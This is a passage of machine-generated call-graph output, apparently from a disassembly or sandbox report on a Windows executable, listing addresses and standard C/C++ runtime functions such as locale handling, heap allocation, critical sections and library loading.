f24e9c 19470->19472 19471->19467 19473 f22c88 ___std_exception_copy 41 API calls 19472->19473 19474 f24ef7 19473->19474 19475 f24f01 19474->19475 19476 f1acfc _Deallocate 11 API calls 19474->19476 19475->19467 19477 f24f0f 19476->19477 19479 f24726 19478->19479 19480 f24757 19479->19480 19481 f24735 19479->19481 19482 f24771 19480->19482 19485 f247c6 19480->19485 19483 f1ac52 _Deallocate 29 API calls 19481->19483 19484 f24a3f _swprintf 43 API calls 19482->19484 19487 f2474d _swprintf __alldvrm codecvt _strrchr 19483->19487 19484->19487 19486 f1b7f0 _Fputc 41 API calls 19485->19486 19485->19487 19486->19487 19487->19467 19489 f2d4f1 _swprintf 43 API calls 19488->19489 19490 f24ddc 19489->19490 19491 f2d3f7 _swprintf 29 API calls 19490->19491 19492 f24e1a 19491->19492 19493 f24e21 19492->19493 19494 f24e5a 19492->19494 19496 f24e33 19492->19496 19493->19467 19495 f24ae3 _swprintf 41 API calls 19494->19495 19495->19493 19497 f24cbe _swprintf 41 API calls 19496->19497 19497->19493 19499 f2d4f1 _swprintf 43 API calls 19498->19499 19500 f24c57 19499->19500 19501 f2d3f7 _swprintf 29 API calls 19500->19501 19502 f24c98 19501->19502 19503 f24c9f 19502->19503 19504 f24cbe _swprintf 41 API calls 19502->19504 19503->19467 19504->19503 19506 f2d4f1 _swprintf 43 API calls 19505->19506 19507 f24a69 19506->19507 19508 f2d3f7 _swprintf 29 API calls 19507->19508 19509 f24ab7 19508->19509 19510 f24ae3 _swprintf 41 API calls 19509->19510 19511 f24abe 19509->19511 19510->19511 19511->19467 19512 f158ea 19513 f15904 19512->19513 19514 f15916 19513->19514 19516 f14c4b 19513->19516 19519 f1ea94 19516->19519 19520 f1eaa0 __FrameHandler3::FrameUnwindToState 19519->19520 19521 f1eaa7 19520->19521 19522 f1eabe 19520->19522 19523 f1e2e0 __Wcrtomb 14 API calls 19521->19523 19532 f1e417 EnterCriticalSection 19522->19532 19525 f1eaac 19523->19525 19527 f1accf __strnicoll 41 API calls 19525->19527 19526 f1eacd 19533 f1e9de 19526->19533 19529 f14c5d 19527->19529 19529->19514 19530 f1eadb 19547 f1eb0a 19530->19547 19532->19526 19534 f1e9f4 19533->19534 19536 f1ea7e _Ungetc 19533->19536 19535 f1ea22 19534->19535 19534->19536 19537 f274e6 _Ungetc 14 API calls 19534->19537 19535->19536 19538 f25466 _Ungetc 41 API calls 19535->19538 19536->19530 19537->19535 19539 f1ea34 19538->19539 19540 f25466 _Ungetc 41 API calls 19539->19540 19541 f1ea57 19539->19541 19542 f1ea40 19540->19542 19541->19536 19550 f1e8d1 19541->19550 19542->19541 19544 f25466 _Ungetc 41 API calls 19542->19544 19545 f1ea4c 19544->19545 19546 f25466 _Ungetc 41 API calls 19545->19546 19546->19541 19569 f1e42b LeaveCriticalSection 19547->19569 19549 f1eb10 19549->19529 19551 f25466 _Ungetc 41 API calls 19550->19551 19552 f1e8f4 19551->19552 19553 f25466 _Ungetc 41 API calls 19552->19553 19560 f1e91d 19552->19560 19554 f1e902 19553->19554 19556 f25466 _Ungetc 41 API calls 19554->19556 19554->19560 19558 f1e910 19556->19558 19557 f1e957 19557->19557 19561 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19557->19561 19559 f25466 _Ungetc 41 API calls 19558->19559 19559->19560 19560->19557 19563 f252c2 19560->19563 19562 f1e9d5 19561->19562 19562->19536 19564 f252d5 _Fputc 19563->19564 19565 f25158 _Fputc 43 API calls 19564->19565 19566 f252ea 19565->19566 19567 f1aa0b _Fputc 41 API calls 19566->19567 19568 f252f7 19567->19568 19568->19557 19569->19549 16993 f12dd1 16994 f12e03 16993->16994 17025 f11d84 16994->17025 16996 f12e59 std::ios_base::_Ios_base_dtor 17040 f11fa0 16996->17040 17000 f12f24 17001 f12f60 17000->17001 17002 f13008 17000->17002 17004 f12f67 17001->17004 17005 f12fb6 17001->17005 17003 f131e2 70 API calls 17002->17003 17007 f12fb1 17003->17007 17069 f13217 17004->17069 17006 f131e2 70 API calls 17005->17006 17010 f12fd9 17006->17010 17058 f131e2 17007->17058 17013 f13217 70 API calls 17010->17013 17011 f131e2 70 API calls 17011->17007 17012 f12ea9 std::ios_base::_Ios_base_dtor 17012->17000 17062 f13fa3 17012->17062 17013->17007 17017 f13217 70 API calls 17018 f13098 17017->17018 17073 f13359 17018->17073 17024 f130be 17088 f142b1 17025->17088 17029 f11da8 17031 f11dbb 17029->17031 17107 f129c0 17029->17107 17100 f14309 17031->17100 17032 f11df1 17032->16996 17035 f11dd2 17117 f145fc 17035->17117 17036 f11df7 17120 f132eb 17036->17120 17849 f11323 17040->17849 17042 f11fc1 17043 f11e76 17042->17043 17044 f142b1 std::_Lockit::_Lockit 7 API calls 17043->17044 17045 f11e87 17044->17045 17046 f12577 int 9 API calls 17045->17046 17049 f11e9a 17046->17049 17047 f11ead 17048 f14309 std::_Lockit::~_Lockit 2 API calls 17047->17048 17050 f11ee3 17048->17050 17049->17047 17907 f12a82 17049->17907 17050->17012 17053 f11ec4 17055 f145fc std::_Facet_Register 43 API calls 17053->17055 17054 f11ee9 17056 f132eb 42 API calls 17054->17056 17055->17047 17057 f11eee 17056->17057 17059 f131ed 17058->17059 17061 f13068 17058->17061 17059->17061 17973 f1242e 17059->17973 17061->17017 17063 f13fb4 17062->17063 17064 f1400e 17062->17064 17068 f13fc0 17063->17068 18144 f11ac5 17063->18144 18153 f133be 17064->18153 17068->17012 17070 f12f7f 17069->17070 17071 f13222 17069->17071 17070->17011 17071->17070 17072 f1242e 70 API calls 17071->17072 17072->17071 17074 f13364 17073->17074 17076 f130a4 17073->17076 17075 f113c0 _Deallocate 41 API calls 17074->17075 17075->17076 17077 f1337f 17076->17077 17078 f13388 17077->17078 17080 f130ad 17077->17080 17079 f1287b 41 API calls 17078->17079 17079->17080 17081 f162ac 17080->17081 17082 f162b5 IsProcessorFeaturePresent 17081->17082 17083 f162b4 17081->17083 17085 f16ad2 17082->17085 17083->17024 18178 f16a95 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17085->18178 17089 f142c0 17088->17089 17090 f142c7 17088->17090 17128 f1da43 17089->17128 17091 f11d95 17090->17091 17133 f16020 EnterCriticalSection 17090->17133 17094 f12577 17091->17094 17095 f12583 17094->17095 17096 f125a7 17094->17096 17097 f142b1 std::_Lockit::_Lockit 7 API calls 17095->17097 17096->17029 17098 f1258d 17097->17098 17099 f14309 std::_Lockit::~_Lockit 2 API calls 17098->17099 17099->17096 17101 f1da51 17100->17101 17102 f14313 17100->17102 17201 f1da2c LeaveCriticalSection 17101->17201 17106 f14326 17102->17106 17200 f1602e LeaveCriticalSection 17102->17200 17105 f1da58 17105->17032 17106->17032 17108 f129d4 17107->17108 17109 f11dcb 17107->17109 17108->17109 17202 f1626e 17108->17202 17109->17035 17109->17036 17111 f129e0 codecvt 17116 f12a09 17111->17116 17218 f11ff9 17111->17218 17116->17109 17232 f12357 17116->17232 17118 f1626e codecvt 43 API calls 17117->17118 17119 f14607 17118->17119 17119->17031 17121 f132f9 codecvt 17120->17121 17122 f18e4c Concurrency::cancel_current_task RaiseException 17121->17122 17123 f13307 17122->17123 17124 f1ac1b _Deallocate 41 API calls 17123->17124 17125 f1acee 17124->17125 17126 f1acfc _Deallocate 11 API calls 17125->17126 17127 f1acfb 17126->17127 17134 f25eef 17128->17134 17133->17091 17155 f2589e 17134->17155 17154 f25f21 17154->17154 17185 f25a87 17155->17185 17158 f258b8 17159 f25a87 __dosmaperr 5 API calls 17158->17159 17160 f258ce 17159->17160 17161 f258d2 17160->17161 17162 f25a87 __dosmaperr 5 API calls 17161->17162 17163 f258e8 17162->17163 17164 f258ec 17163->17164 17165 f25a87 __dosmaperr 5 API calls 17164->17165 17166 f25902 17165->17166 17167 f25906 17166->17167 17168 f25a87 __dosmaperr 5 API calls 17167->17168 17169 f2591c 17168->17169 17170 f25920 17169->17170 17171 f25a87 __dosmaperr 5 API calls 17170->17171 17172 f25936 17171->17172 17173 f2593a 17172->17173 17174 f25a87 __dosmaperr 5 API calls 17173->17174 17175 f25950 17174->17175 17176 f25954 17175->17176 17177 f25a87 __dosmaperr 5 API calls 17176->17177 17178 f2596a 17177->17178 17179 f25988 17178->17179 17180 f25a87 __dosmaperr 5 API calls 17179->17180 17181 f2599e 17180->17181 17182 f2596e 17181->17182 17183 f25a87 __dosmaperr 5 API calls 17182->17183 17184 f25984 17183->17184 17184->17154 17186 f258b4 17185->17186 17187 f25ab5 17185->17187 17186->17158 17187->17186 17192 f259bc 17187->17192 17190 f25acf GetProcAddress 17190->17186 17191 f25adf __dosmaperr 17190->17191 17191->17186 17198 f259cd ___vcrt_InitializeCriticalSectionEx 17192->17198 17193 f25a63 17193->17186 17193->17190 17194 f259eb LoadLibraryExW 17195 f25a06 GetLastError 17194->17195 17196 f25a6a 17194->17196 17195->17198 17196->17193 17197 f25a7c FreeLibrary 17196->17197 17197->17193 17198->17193 17198->17194 17199 f25a39 LoadLibraryExW 17198->17199 17199->17196 17199->17198 17200->17106 17201->17105 17204 f16273 17202->17204 17205 f1628d 17204->17205 17207 f1628f 17204->17207 17247 f1da5a 17204->17247 17259 f203b0 17204->17259 17205->17111 17208 f16299 17207->17208 17209 f132ce Concurrency::cancel_current_task 17207->17209 17208->17208 17256 f18e4c 17209->17256 17211 f132ea codecvt 17212 f18e4c Concurrency::cancel_current_task RaiseException 17211->17212 17213 f13307 17212->17213 17262 f1ac1b 17213->17262 17217 f1acfb 17219 f142b1 std::_Lockit::_Lockit 7 API calls 17218->17219 17220 f12005 17219->17220 17221 f12033 17220->17221 17222 f12046 17220->17222 17576 f1472c 17221->17576 17585 f14478 17222->17585 17845 f14777 17232->17845 17235 f1aefa ~ctype 14 API calls 17239 f12370 17235->17239 17236 f1aefa ~ctype 14 API calls 17238 f12383 17236->17238 17237 f12394 17241 f123a5 17237->17241 17242 f1aefa ~ctype 14 API calls 17237->17242 17238->17237 17240 f1aefa ~ctype 14 API calls 17238->17240 17239->17236 17239->17238 17240->17237 17243 f123b6 17241->17243 17244 f1aefa ~ctype 14 API calls 17241->17244 17242->17241 17245 f123c7 17243->17245 17246 f1aefa ~ctype 14 API calls 17243->17246 17244->17243 17246->17245 17248 f245c0 17247->17248 17249 f245fe 17248->17249 17251 f245e9 HeapAlloc 17248->17251 17255 f245d2 __dosmaperr 17248->17255 17272 f1e2e0 17249->17272 17252 f245fc 17251->17252 17251->17255 17253 f24603 17252->17253 17253->17204 17254 f203b0 codecvt 2 API calls 17254->17255 17255->17249 17255->17251 17255->17254 17257 f18e93 RaiseException 17256->17257 17258 f18e66 17256->17258 17257->17211 17258->17257 17382 f203dd 17259->17382 17263 f1ac2d _Fputc 17262->17263 17393 f1ac52 17263->17393 17268 f1acfc IsProcessorFeaturePresent 17269 f1ad08 17268->17269 17270 f1aad3 std::locale::_Setgloballocale 8 API calls 17269->17270 17271 f1ad1d GetCurrentProcess TerminateProcess 17270->17271 17271->17217 17275 f23231 GetLastError 17272->17275 17274 f1e2e5 17274->17253 17276 f23247 17275->17276 17279 f2324d 17275->17279 17298 f25c98 17276->17298 17295 f23251 SetLastError 17279->17295 17303 f25cd7 17279->17303 17283 f2327e 17284 f23286 17283->17284 17285 f23297 17283->17285 17286 f25cd7 __dosmaperr 6 API calls 17284->17286 17287 f25cd7 __dosmaperr 6 API calls 17285->17287 17289 f23294 17286->17289 17288 f232a3 17287->17288 17290 f232a7 17288->17290 17291 f232be 17288->17291 17315 f24396 17289->17315 17292 f25cd7 __dosmaperr 6 API calls 17290->17292 17321 f22f0e 17291->17321 17292->17289 17295->17274 17299 f25a87 __dosmaperr 5 API calls 17298->17299 17300 f25cb4 17299->17300 17301 f25ccf TlsGetValue 17300->17301 17302 f25cbd 17300->17302 17302->17279 17304 f25a87 __dosmaperr 5 API calls 17303->17304 17305 f25cf3 17304->17305 17306 f25d11 TlsSetValue 17305->17306 17307 f23269 17305->17307 17307->17295 17308 f24339 17307->17308 17314 f24346 __dosmaperr 17308->17314 17309 f24386 17311 f1e2e0 __Wcrtomb 13 API calls 17309->17311 17310 f24371 HeapAlloc 17312 f24384 17310->17312 17310->17314 17311->17312 17312->17283 17313 f203b0 codecvt 2 API calls 17313->17314 17314->17309 17314->17310 17314->17313 17316 f243a1 HeapFree 17315->17316 17320 f243cb 17315->17320 17317 f243b6 GetLastError 17316->17317 17316->17320 17318 f243c3 __dosmaperr 17317->17318 17319 f1e2e0 __Wcrtomb 12 API calls 17318->17319 17319->17320 17320->17295 17326 f22da2 17321->17326 17327 f22dae __FrameHandler3::FrameUnwindToState 17326->17327 17340 f1d9e4 EnterCriticalSection 17327->17340 17329 f22db8 17341 f22de8 17329->17341 17332 f22eb4 17333 f22ec0 __FrameHandler3::FrameUnwindToState 17332->17333 17345 f1d9e4 EnterCriticalSection 17333->17345 17335 f22eca 17346 f23095 17335->17346 17340->17329 17344 f1da2c LeaveCriticalSection 17341->17344 17343 f22dd6 17343->17332 17344->17343 17345->17335 17383 f203e9 __FrameHandler3::FrameUnwindToState 17382->17383 17388 f1d9e4 EnterCriticalSection 17383->17388 17385 f203f4 17389 f20430 17385->17389 17388->17385 17392 f1da2c LeaveCriticalSection 17389->17392 17391 f203bb 17391->17204 17392->17391 17394 f1ac62 17393->17394 17395 f1ac69 17393->17395 17408 f1aa70 GetLastError 17394->17408 17396 f1ac45 17395->17396 17412 f1aa47 17395->17412 17402 f1aa0b 17396->17402 17399 f1ac9e 17399->17396 17400 f1acfc _Deallocate 11 API calls 17399->17400 17401 f1acce 17400->17401 17403 f1aa17 17402->17403 17406 f1aa2e 17403->17406 17437 f1aab6 17403->17437 17405 f1aab6 _Fputc 41 API calls 17407 f1aa41 17405->17407 17406->17405 17406->17407 17407->17268 17409 f1aa89 17408->17409 17415 f232e2 17409->17415 17413 f1aa52 GetLastError SetLastError 17412->17413 17414 f1aa6b 17412->17414 17413->17399 17414->17399 17416 f232f5 17415->17416 17417 f232fb 17415->17417 17418 f25c98 __dosmaperr 6 API calls 17416->17418 17419 f25cd7 __dosmaperr 6 API calls 17417->17419 17436 f1aaa1 SetLastError 17417->17436 17418->17417 17420 f23315 17419->17420 17421 f24339 __dosmaperr 14 API calls 17420->17421 17420->17436 17422 f23325 17421->17422 17423 f23342 17422->17423 17424 f2332d 17422->17424 17426 f25cd7 __dosmaperr 6 API calls 17423->17426 17425 f25cd7 __dosmaperr 6 API calls 17424->17425 17433 f23339 17425->17433 17427 f2334e 17426->17427 17428 f23352 17427->17428 17429 f23361 17427->17429 17431 f25cd7 __dosmaperr 6 API calls 17428->17431 17432 f22f0e __dosmaperr 14 API calls 17429->17432 17430 f24396 ___free_lconv_mon 14 API calls 17430->17436 17431->17433 17434 f2336c 17432->17434 17433->17430 17435 f24396 ___free_lconv_mon 14 API calls 17434->17435 17435->17436 17436->17395 17438 f1aac0 17437->17438 17439 f1aac9 17437->17439 17440 f1aa70 _Fputc 16 API calls 17438->17440 17439->17406 17441 f1aac5 17440->17441 17441->17439 17444 f200d9 17441->17444 17455 f28cfb 17444->17455 17448 f200f3 IsProcessorFeaturePresent 17451 f200ff 17448->17451 17449 f20112 17491 f20f58 17449->17491 17450 f200e9 17450->17448 17450->17449 17485 f1aad3 17451->17485 17494 f28c2d 17455->17494 17458 f28d40 17459 f28d4c __FrameHandler3::FrameUnwindToState 17458->17459 17460 f23231 __dosmaperr 14 API calls 17459->17460 17461 f28d73 std::locale::_Setgloballocale 17459->17461 17465 f28d79 std::locale::_Setgloballocale 17459->17465 17460->17461 17462 f28dc0 17461->17462 17461->17465 17484 f28daa 17461->17484 17463 f1e2e0 __Wcrtomb 14 API calls 17462->17463 17467 f28dec 17465->17467 17507 f1d9e4 EnterCriticalSection 17465->17507 17470 f28e2e 17467->17470 17471 f28f1f 17467->17471 17481 f28e5d 17467->17481 17470->17481 17484->17450 17486 f1aaef codecvt std::locale::_Setgloballocale 17485->17486 17541 f20d7c 17491->17541 17495 f28c39 __FrameHandler3::FrameUnwindToState 17494->17495 17500 f1d9e4 EnterCriticalSection 17495->17500 17497 f28c47 17501 f28c85 17497->17501 17500->17497 17502 f1da2c std::_Lockit::~_Lockit LeaveCriticalSection 17501->17502 17503 f200de 17502->17503 17503->17450 17503->17458 17507->17467 17542 f20dbb 17541->17542 17543 f20da9 17541->17543 17590 f1dcba 17576->17590 17581 f14750 17758 f143cf 17585->17758 17588 f18e4c Concurrency::cancel_current_task RaiseException 17589 f14497 17588->17589 17591 f25eef std::_Lockit::_Lockit 5 API calls 17590->17591 17592 f1dcc7 17591->17592 17601 f1da65 17592->17601 17595 f14586 17596 f14594 17595->17596 17600 f145bf _Yarn 17595->17600 17597 f145a0 17596->17597 17755 f1aefa 17596->17755 17597->17600 17600->17581 17602 f1da71 __FrameHandler3::FrameUnwindToState 17601->17602 17609 f1d9e4 EnterCriticalSection 17602->17609 17604 f1da7f 17610 f1dac0 17604->17610 17609->17604 17635 f1dc1f 17610->17635 17612 f1dadb 17613 f230e0 __Getctype 41 API calls 17612->17613 17630 f1da8c 17612->17630 17614 f1dae8 17613->17614 17659 f265dd 17614->17659 17632 f1dab4 17630->17632 17754 f1da2c LeaveCriticalSection 17632->17754 17634 f14738 17634->17595 17636 f1dc39 17635->17636 17637 f1dc2b 17635->17637 17689 f2621b 17636->17689 17674 f21a51 17637->17674 17640 f1dc35 17640->17612 17642 f1dcaf 17644 f1acfc _Deallocate 11 API calls 17642->17644 17643 f24339 __dosmaperr 14 API calls 17645 f1dc6b 17643->17645 17646 f1dcb9 17644->17646 17647 f2621b std::_Locinfo::_Locinfo_ctor 43 API calls 17645->17647 17658 f1dc93 17645->17658 17651 f25eef std::_Lockit::_Lockit 5 API calls 17646->17651 17650 f1dc82 17647->17650 17648 f24396 ___free_lconv_mon 14 API calls 17649 f1dca8 17648->17649 17649->17612 17653 f1dc95 17650->17653 17654 f1dc89 17650->17654 17652 f1dcc7 17651->17652 17655 f1da65 std::_Locinfo::_Locinfo_ctor 69 API calls 17652->17655 17656 f21a51 std::_Locinfo::_Locinfo_ctor 66 API calls 17653->17656 17654->17642 17654->17658 17656->17658 17658->17648 17660 f265f1 _Fputc 17659->17660 17721 f26258 17660->17721 17675 f21a67 17674->17675 17676 f21a7b 17674->17676 17677 f1e2e0 __Wcrtomb 14 API calls 17675->17677 17678 f230e0 __Getctype 41 API calls 17676->17678 17679 f21a6c 17677->17679 17680 f21a80 17678->17680 17681 f1accf __strnicoll 41 API calls 17679->17681 17682 f25eef std::_Lockit::_Lockit 5 API calls 17680->17682 17683 f21a77 17681->17683 17684 f21a88 17682->17684 17683->17640 17695 f2b9f5 17684->17695 17690 f2622e _Fputc 17689->17690 17712 f25f70 17690->17712 17693 f1aa0b _Fputc 41 API calls 17694 f1dc50 17693->17694 17694->17642 17694->17643 17696 f2ba01 __FrameHandler3::FrameUnwindToState 17695->17696 17697 f230e0 __Getctype 41 API calls 17696->17697 17698 f2ba0a 17697->17698 17699 f1d9e4 std::_Lockit::_Lockit EnterCriticalSection 17698->17699 17705 f21a8d 17698->17705 17700 f2ba28 17699->17700 17701 f2ba76 __Getctype 14 API calls 17700->17701 17702 f2ba39 17701->17702 17703 f2ba55 __Getctype LeaveCriticalSection 17702->17703 17708 f21059 17705->17708 17709 f21065 __FrameHandler3::FrameUnwindToState 17708->17709 17710 f21186 std::_Locinfo::_Locinfo_ctor 66 API calls 17709->17710 17711 f21071 std::_Locinfo::_Locinfo_ctor 17710->17711 17713 f25f83 17712->17713 17714 f25f87 17713->17714 17716 f25faf 17713->17716 17715 f1ac52 _Deallocate 29 API calls 17714->17715 17720 f25fa5 17715->17720 17717 f26050 std::_Locinfo::_Locinfo_ctor 43 API calls 17716->17717 17719 f25fd4 17716->17719 17717->17719 17718 f1ac52 _Deallocate 29 API calls 17718->17720 17719->17718 17719->17720 17720->17693 17722 f2626f 17721->17722 17723 f26273 17722->17723 17725 f2629b 17722->17725 17754->17634 17761 f121a0 17758->17761 17764 f18dca 17761->17764 17765 f121cc 17764->17765 17766 f18dd7 17764->17766 17765->17588 17766->17765 17766->17766 17767 f1da5a _Yarn 15 API calls 17766->17767 17768 f18df4 17767->17768 17769 f18e04 17768->17769 17772 f22c88 17768->17772 17771 f1aefa ~ctype 14 API calls 17769->17771 17771->17765 17773 f22c96 17772->17773 17774 f22ca4 17772->17774 17773->17774 17779 f22cbc 17773->17779 17775 f1e2e0 __Wcrtomb 14 API calls 17774->17775 17776 f22cac 17775->17776 17777 f1accf __strnicoll 41 API calls 17776->17777 17778 f22cb6 17777->17778 17778->17769 17779->17778 17780 f1e2e0 __Wcrtomb 14 API calls 17779->17780 17780->17776 17846 f14783 17845->17846 17847 f12361 17845->17847 17848 f1dcba std::_Locinfo::_Locinfo_ctor 69 API calls 17846->17848 17847->17235 17847->17239 17848->17847 17850 f11398 17849->17850 17853 f11334 17849->17853 17863 f133a8 17850->17863 17855 f1133b 17853->17855 17856 f133e7 17853->17856 17855->17042 17857 f133f2 17856->17857 17858 f133fe 17856->17858 17868 f1116b 17857->17868 17876 f132ce 17858->17876 17861 f133fa 17861->17855 17899 f14438 17863->17899 17869 f11176 17868->17869 17870 f1117e 17868->17870 17886 f1118d 17869->17886 17872 f1118a 17870->17872 17874 f1626e codecvt 43 API calls 17870->17874 17872->17861 17875 f11188 17874->17875 17875->17861 17877 f132dc Concurrency::cancel_current_task 17876->17877 17878 f18e4c Concurrency::cancel_current_task RaiseException 17877->17878 17879 f132ea codecvt 17878->17879 17880 f18e4c Concurrency::cancel_current_task RaiseException 17879->17880 17881 f13307 17880->17881 17882 f1ac1b _Deallocate 41 API calls 17881->17882 17883 f1acee 17882->17883 17884 f1acfc _Deallocate 11 API calls 17883->17884 17885 f1acfb 17884->17885 17887 f1119c 17886->17887 17889 f132ce Concurrency::cancel_current_task 17886->17889 17888 f1626e codecvt 43 API calls 17887->17888 17891 f111a2 17888->17891 17890 f18e4c Concurrency::cancel_current_task RaiseException 17889->17890 17895 f132ea codecvt 17890->17895 17892 f1117c 17891->17892 17893 f1ac1b _Deallocate 41 API calls 17891->17893 17892->17861 17894 f1acee 17893->17894 17896 f1acfc _Deallocate 11 API calls 17894->17896 17897 f18e4c Concurrency::cancel_current_task RaiseException 17895->17897 17898 f1acfb 17896->17898 17897->17891 17904 f1435b 17899->17904 17902 f18e4c Concurrency::cancel_current_task RaiseException 17903 f14457 17902->17903 17905 f121a0 std::exception::exception 42 API calls 17904->17905 17906 f1436d 17905->17906 17906->17902 17908 f11ebd 17907->17908 17909 f12a96 17907->17909 17908->17053 17908->17054 17909->17908 17910 f1626e codecvt 43 API calls 17909->17910 17912 f12aa2 codecvt 17910->17912 17911 f12acd 17911->17908 17914 f12357 std::_Locinfo::~_Locinfo 69 API calls 17911->17914 17912->17911 17913 f11ff9 codecvt 72 API calls 17912->17913 17915 f12aba 17913->17915 17914->17908 17917 f12bda 17915->17917 17936 f1d97b 17917->17936 17920 f148ac codecvt 41 API calls 17921 f12c05 17920->17921 17922 f148ac codecvt 41 API calls 17921->17922 17923 f12c38 17922->17923 17941 f119d8 17923->17941 17925 f12c44 17937 f230e0 __Getctype 41 API calls 17936->17937 17938 f1d986 17937->17938 17939 f24504 __Getctype 41 API calls 17938->17939 17940 f12bf9 17939->17940 17940->17920 17942 f119e3 __Getctype _strlen 17941->17942 17944 f119f7 _Yarn 17942->17944 17959 f1441b 17942->17959 17944->17925 17960 f14429 Concurrency::cancel_current_task 17959->17960 17974 f12438 17973->17974 17975 f12441 17973->17975 17977 f1418d 17974->17977 17975->17059 17978 f14195 17977->17978 17979 f1419d 17978->17979 17981 f157bd 17978->17981 17979->17975 17982 f157e8 17981->17982 17987 f157df 17981->17987 17984 f15828 17982->17984 17982->17987 17988 f1584e 17982->17988 17983 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17985 f1584a 17983->17985 17993 f14c2e 17984->17993 17985->17979 17987->17983 17989 f158a9 17988->17989 17990 f1588a 17988->17990 17989->17987 17996 f1f796 17989->17996 17990->17987 17992 f14c2e _Fputc 45 API calls 17990->17992 17992->17987 18002 f1e822 17993->18002 17997 f1f7a9 _Fputc 17996->17997 18003 f1e835 _Fputc 18002->18003 18145 f11b53 18144->18145 18147 f11ade 18144->18147 18146 f133a8 std::ios_base::_Init 43 API calls 18145->18146 18148 f11b58 18146->18148 18149 f133e7 43 API calls 18147->18149 18150 f11b02 18149->18150 18152 f11b37 18150->18152 18156 f1287b 18150->18156 18152->17068 18170 f14458 18153->18170 18159 f113c0 18156->18159 18158 f12890 18158->18152 18160 f113cd 18159->18160 18161 f113da error_info_injector 18159->18161 18163 f1277d 18160->18163 18161->18158 18164 f12797 18163->18164 18165 f1279a 18163->18165 18164->18161 18166 f1ac1b _Deallocate 41 API calls 18165->18166 18167 f1acee 18166->18167 18168 f1acfc _Deallocate 11 API calls 18167->18168 18169 f1acfb 18168->18169 18175 f143b0 18170->18175 18173 f18e4c Concurrency::cancel_current_task RaiseException 18174 f14477 18173->18174 18176 f121a0 std::exception::exception 42 API calls 18175->18176 18177 f143c2 18176->18177 18177->18173 20833 f213d2 20836 f2109e 20833->20836 20837 f210aa __FrameHandler3::FrameUnwindToState 20836->20837 20844 f1d9e4 EnterCriticalSection 20837->20844 20839 f210e2 20849 f21100 20839->20849 20840 f210b4 20840->20839 20845 f2ba76 20840->20845 20844->20840 20846 f2ba84 __Getctype 20845->20846 20848 f2ba91 20845->20848 20847 f2b7a9 __Getctype 14 API calls 20846->20847 20846->20848 20847->20848 20848->20840 20852 f1da2c LeaveCriticalSection 20849->20852 20851 f210ee 20852->20851 20853 f14fd1 20856 f14ea5 20853->20856 20855 f14fdc error_info_injector 20857 f14ed6 20856->20857 20859 f14ee8 20857->20859 20860 f154a6 20857->20860 20859->20855 20861 f154b0 20860->20861 20862 f154ce 20860->20862 20863 f15166 69 API calls 20861->20863 20862->20859 20864 f154bd 20863->20864 20866 f1ec37 20864->20866 20867 f1ec4a _Fputc 20866->20867 20872 f1eb12 20867->20872 20869 f1ec56 20870 f1aa0b _Fputc 41 API calls 20869->20870 20871 f1ec62 20870->20871 20871->20862 20873 f1eb1e __FrameHandler3::FrameUnwindToState 20872->20873 20874 f1eb28 20873->20874 20875 f1eb4b 20873->20875 20876 f1ac52 _Deallocate 29 API calls 20874->20876 20882 f1eb43 20875->20882 20883 f1e417 EnterCriticalSection 20875->20883 20876->20882 20878 f1eb69 20884 f1eba9 20878->20884 20880 f1eb76 20898 f1eba1 20880->20898 20882->20869 20883->20878 20885 f1ebb6 20884->20885 20886 f1ebd9 20884->20886 20887 f1ac52 _Deallocate 29 API calls 20885->20887 20888 f1ebd1 20886->20888 20889 f1eea4 ___scrt_uninitialize_crt 66 API calls 20886->20889 20887->20888 20888->20880 20890 f1ebf1 20889->20890 20901 f26d01 20890->20901 20893 f25466 _Ungetc 41 API calls 20894 f1ec05 20893->20894 20905 f275d3 20894->20905 20897 f24396 ___free_lconv_mon 14 API calls 20897->20888 20947 f1e42b LeaveCriticalSection 20898->20947 20900 f1eba7 20900->20882 20902 f26d18 20901->20902 20903 f1ebf9 20901->20903 20902->20903 20904 f24396 ___free_lconv_mon 14 API calls 20902->20904 20903->20893 20904->20903 20906 f275fc 20905->20906 20911 f1ec0c 20905->20911 20907 f2764b 20906->20907 20909 f27623 20906->20909 20908 f1ac52 _Deallocate 29 API calls 20907->20908 20908->20911 20912 f27542 20909->20912 20911->20888 20911->20897 20913 f2754e __FrameHandler3::FrameUnwindToState 20912->20913 20920 f2a908 EnterCriticalSection 20913->20920 20915 f2758d 20934 f275c7 20915->20934 20916 f2755c 20916->20915 20921 f27676 20916->20921 20920->20916 20922 f2a9df ___scrt_uninitialize_crt 41 API calls 20921->20922 20924 f27686 20922->20924 20923 f2768c 20937 f2a94e 20923->20937 20924->20923 20925 f276be 20924->20925 20927 f2a9df ___scrt_uninitialize_crt 41 API calls 20924->20927 20925->20923 20928 f2a9df ___scrt_uninitialize_crt 41 API calls 20925->20928 20929 f276b5 20927->20929 20930 f276ca CloseHandle 20928->20930 20931 f2a9df ___scrt_uninitialize_crt 41 API calls 20929->20931 20930->20923 20932 f276d6 GetLastError 20930->20932 20931->20925 20932->20923 20933 f276e4 ___scrt_uninitialize_crt 20933->20915 20946 f2a92b LeaveCriticalSection 20934->20946 20936 f275b0 20936->20911 20938 f2a9c4 20937->20938 20939 f2a95d 20937->20939 20940 f1e2e0 __Wcrtomb 14 API calls 20938->20940 20939->20938 20943 f2a987 20939->20943 20941 f2a9c9 20940->20941 20942 f1e2cd __dosmaperr 14 API calls 20941->20942 20944 f2a9b4 20942->20944 20943->20944 20945 f2a9ae SetStdHandle 20943->20945 20944->20933 20945->20944 20946->20936 20947->20900 19570 f26ed0 19571 f26edf 19570->19571 19575 f26ef4 19570->19575 19572 f1e2e0 __Wcrtomb 14 API calls 19571->19572 19573 f26ee4 19572->19573 19574 f1accf __strnicoll 41 API calls 19573->19574 19584 f26eef 19574->19584 19576 f26f52 19575->19576 19577 f274e6 _Ungetc 14 API calls 19575->19577 19575->19584 19578 f25466 _Ungetc 41 API calls 19576->19578 19577->19576 19579 f26f82 19578->19579 19590 f2f45a 19579->19590 19582 f25466 _Ungetc 41 API calls 19583 f26fc4 19582->19583 19583->19584 19585 f25466 _Ungetc 41 API calls 19583->19585 19586 f26fd2 19585->19586 19586->19584 19587 f25466 _Ungetc 41 API calls 19586->19587 19588 f26fe0 19587->19588 19589 f25466 _Ungetc 41 API calls 19588->19589 19589->19584 19591 f2f466 __FrameHandler3::FrameUnwindToState 19590->19591 19592 f2f486 19591->19592 19593 